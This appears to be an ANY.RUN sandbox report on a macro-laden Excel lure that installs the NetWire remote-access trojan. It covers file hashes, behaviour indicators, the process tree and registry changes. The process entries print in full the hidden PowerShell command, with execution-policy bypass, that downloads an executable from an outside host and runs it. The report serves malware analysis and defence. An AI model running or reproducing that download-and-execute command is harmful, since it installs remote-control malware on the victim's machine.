General Info

File name

LetterofIntent-Eckharthelicopter.xls

Full analysis
https://app.any.run/tasks/398235d6-6d1a-465e-b96b-52122be095e1
Verdict
Malicious activity
Threats:

Netwire is an advanced RAT — it is a malware that takes control of infected PCs and allows its operators to perform various actions. Unlike many RATs, this one can target every major operating system, including Windows, Linux, and MacOS.

Malware Trends Tracker

More details
Analysis date
7/24/2020, 20:54:59
OS:
Windows 10 Professional (build: 16299, 64 bit)
Tags:

macros

macros-on-open

loader

trojan

netwire

rat

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: DAZED, Last Saved By: DAZED, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jul 24 16:01:52 2020, Last Saved Time/Date: Fri Jul 24 16:06:33 2020, Security: 0
MD5

6cb7256dde8c6cf09fc82b7f75fd18ad

SHA1

9b5bb3f2fda7a6e316a210942d0d65d1e877761d

SHA256

2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208

SSDEEP

12288:huj3HVAQHVxSCyGnOsDRGzg5Bi0nvGfqTuRJwWJsZSk9A+oMD1L0Nc:UXVAQ1xSp8IzgSgvqRJwWJsZSoywL0S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.431.16299.0 KB4103768
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • CCleaner (5.35)
  • FileZilla Client 3.31.0 (3.31.0)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft Office Professional 2019 - de-de (16.0.12026.20264)
  • Microsoft Office Professional 2019 - en-us (16.0.12026.20264)
  • Microsoft Office Professional 2019 - es-es (16.0.12026.20264)
  • Microsoft Office Professional 2019 - it-it (16.0.12026.20264)
  • Microsoft Office Professional 2019 - ja-jp (16.0.12026.20264)
  • Microsoft Office Professional 2019 - ko-kr (16.0.12026.20264)
  • Microsoft Office Professional 2019 - pt-br (16.0.12026.20264)
  • Microsoft Office Professional 2019 - tr-tr (16.0.12026.20264)
  • Microsoft Office Professionnel 2019 - fr-fr (16.0.12026.20264)
  • Microsoft Office профессиональный 2019 - ru-ru (16.0.12026.20264)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Office 16 Click-to-Run Extensibility Component (16.0.12026.20264)
  • Office 16 Click-to-Run Licensing Component (16.0.12026.20264)
  • Office 16 Click-to-Run Localization Component (16.0.12026.20264)
  • Opera 12.15 (12.15.1748)
  • QGA (2.10.81)
  • Skype™ 7.39 (7.39.102)
  • Update for Windows 10 for x64-based Systems (KB4023057) (2.19.0.0)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)
  • Windows 10 Upgrade Assistant (1.4.9200.22175)

Hotfixes

  • Client LanguagePack Package
  • Foundation Package
  • InternetExplorer Optional Package
  • KB4054022
  • KB4055237
  • KB4055994
  • KB4058043
  • KB4078408
  • KB4093110
  • KB4094276
  • KB4103729
  • KB4131372
  • KB4134661
  • LanguageFeatures Basic en us Package
  • LanguageFeatures Handwriting en us Package
  • LanguageFeatures OCR en us Package
  • LanguageFeatures Speech en us Package
  • LanguageFeatures TextToSpeech en us Package
  • MediaPlayer Package
  • Microsoft OneCore ApplicationModel Sync Desktop FOD Package
  • NetFx3 OnDemand Package
  • ProfessionalEdition
  • QuickAssist Package
  • RollupFix

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • solute.exe (PID: 2752)
  • solu.exe (PID: 1740)
Executes PowerShell scripts
  • cmd.exe (PID: 72)
Starts CMD.EXE for commands execution
  • EXCEL.EXE (PID: 4580)
Downloads executable files from the Internet
  • powershell.exe (PID: 1948)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 4580)
Changes the autorun value in the registry
  • solu.exe (PID: 1740)
Connects to CnC server
  • solu.exe (PID: 1740)
NETWIRE was detected
  • solu.exe (PID: 1740)
 Executable content was dropped or overwritten
  • powershell.exe (PID: 1948)
  • solute.exe (PID: 2752)
Reads Environment values
  • powershell.exe (PID: 1948)
Reads the machine GUID from the registry
  • powershell.exe (PID: 1948)
Creates files in the user directory
  • solute.exe (PID: 2752)
Starts itself from another location
  • solute.exe (PID: 2752)
 Reads settings of System Certificates
  • EXCEL.EXE (PID: 4580)
  • powershell.exe (PID: 1948)
Reads the software policy settings
  • powershell.exe (PID: 1948)
  • EXCEL.EXE (PID: 4580)
Reads Environment values
  • EXCEL.EXE (PID: 4580)
Creates files in the user directory
  • EXCEL.EXE (PID: 4580)
Reads the machine GUID from the registry
  • EXCEL.EXE (PID: 4580)
Scans artifacts that could help determine the target
  • EXCEL.EXE (PID: 4580)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 4580)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (48%)
.xls
|   Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
CompObjUserType:
Microsoft Excel 2003 Worksheet
CompObjUserTypeLen:
31
HeadingPairs
null
null
TitleOfParts:
Sheet1
HyperlinksChanged:
No
SharedDoc:
No
LinksUpToDate:
No
ScaleCrop:
No
AppVersion:
16
Company:
null
CodePage:
Windows Latin 1 (Western European)
Security:
None
ModifyDate:
2020:07:24 15:06:33
CreateDate:
2020:07:24 15:01:52
Software:
Microsoft Excel
LastModifiedBy:
DAZED
Author:
DAZED

Video and screenshots

Screenshot of 2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208 taken from 18080 ms from task started Screenshot of 2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208 taken from 32175 ms from task started Screenshot of 2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208 taken from 35185 ms from task started Screenshot of 2cb072d9fcc9413a91b245513366c7bb52bfec2638f67c158520c2854e264208 taken from 36186 ms from task started

Processes

Total processes
93
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

+
start drop and start drop and start excel.exe cmd.exe no specs conhost.exe powershell.exe solute.exe #NETWIRE solu.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
4580
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\LetterofIntent-Eckharthelicopter.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.12026.20264
Modules
Image
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\shell32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\profapi.dll
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\userenv.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\win32u.dll
c:\windows\system32\cfgmgr32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d2d1.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\winsta.dll
c:\windows\system32\d3d10warp.dll
c:\windows\system32\msctf.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\dwrite.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\msvcp110_win.dll
c:\program files\microsoft office\root\office16\msoaria.dll
c:\windows\system32\imagehlp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\msiso.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dsreg.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\ncrypt.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\secur32.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\fwpuclnt.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\dpapi.dll
c:\windows\system32\explorerframe.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\dcomp.dll
c:\windows\system32\slc.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\globinputhost.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\srpapi.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\d3dcompiler_47.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\windows.security.authentication.web.core.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\nsi.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\wininet.dll
c:\windows\system32\netutils.dll
c:\windows\system32\xmllite.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\adal.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\webio.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\sppc.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\aepic.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\imm32.dll
c:\windows\system32\onecorecommonproxystub.dll
c:\windows\system32\elscore.dll
c:\windows\system32\mpr.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\propsys.dll
c:\windows\system32\coml2.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\usp10.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\appresolver.dll
c:\windows\system32\webservices.dll

PID
72
CMD
cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')
Path
C:\WINDOWS\SYSTEM32\cmd.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernel32.dll

PID
3424
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\msvcp_win.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\win32u.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\conhost.exe
c:\windows\system32\gdi32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\shell32.dll

PID
1948
CMD
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hodrc.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\solute.exe')
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\bcrypt.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptsp.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\kernelbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\shlwapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\secur32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\coml2.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\user32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\system32\shcore.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\clbcatq.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\amsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\system32\powrprof.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\system32\userenv.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\wshext.dll
c:\windows\system32\urlmon.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\system32\rasman.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\msiso.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mpr.dll
c:\windows\system32\pcacli.dll
c:\windows\system32\edputil.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll

PID
2752
CMD
"C:\Users\admin\AppData\Local\Temp\solute.exe"
Path
C:\Users\admin\AppData\Local\Temp\solute.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
XACT Build Utility
Version
9.29 (DXSDK_JUN10.100602-0421)
Modules
Image
c:\users\admin\appdata\local\temp\solute.exe
c:\windows\system32\wow64win.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\msvcrt.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\systemroot\system32\ntdll.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\shcore.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\gdi32full.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\windows.staterepositoryps.dll
c:\windows\syswow64\netutils.dll
c:\windows\syswow64\netapi32.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\cldapi.dll
c:\windows\syswow64\imagehlp.dll
c:\windows\syswow64\msiso.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\edputil.dll
c:\windows\syswow64\aepic.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\kernel.appcore.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\win32u.dll
c:\windows\syswow64\msvcp_win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\combase.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\windows.storage.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\sspicli.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\fltlib.dll
c:\windows\syswow64\propsys.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\cfgmgr32.dll

PID
1740
CMD
"C:\Users\admin\AppData\Roaming\solu\solu.exe"
Path
C:\Users\admin\AppData\Roaming\solu\solu.exe
Indicators
Parent process
solute.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
XACT Build Utility
Version
9.29 (DXSDK_JUN10.100602-0421)
Modules
Image
c:\windows\syswow64\gdi32full.dll
c:\windows\syswow64\msvcp_win.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\kernel.appcore.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\advapi32.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\windows.storage.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\shcore.dll
c:\systemroot\system32\ntdll.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
c:\users\admin\appdata\roaming\solu\solu.exe
c:\windows\syswow64\win32u.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\nlaapi.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\netutils.dll
c:\windows\syswow64\napinsp.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\winrnr.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\netapi32.dll
c:\windows\syswow64\pnrpnsp.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\cscapi.dll
c:\windows\syswow64\wkscli.dll

Registry activity

Total events
2869
Read events
0
Write events
268
Delete events
39

Modification events

PID
Process
Operation
Key
Name
Value
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
4580
EXCEL.EXE
delete key
